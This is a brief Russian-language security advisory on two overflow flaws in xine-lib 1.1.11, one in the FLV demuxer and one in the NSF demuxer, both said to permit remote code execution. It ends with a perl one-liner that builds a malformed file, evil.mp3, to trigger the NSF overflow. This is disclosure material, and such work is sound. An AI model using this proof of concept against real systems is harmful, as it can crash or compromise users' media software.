Программа: xine-lib 1.1.11
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе.
1) Уязвимость существует из-за ошибки в проверке входных данных в demux_flv.c.
Атакующий может передать специально сформированные данные, что приведет к
переполнению динамической памяти и выполнению произвольного кода.
2) Уязвимость существует из-за ошибки в проверке входных данных в NES Sound
Format Demuxer в 'demux_nsf.c'. Атакующий может передать специально
сформированные mp3 Файлы, что приведет к переполнению буфера и выполнению
произвольного кода.
Эксплоит:
perl -e 'print "\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" .
"\x41" x 114' > evil.mp3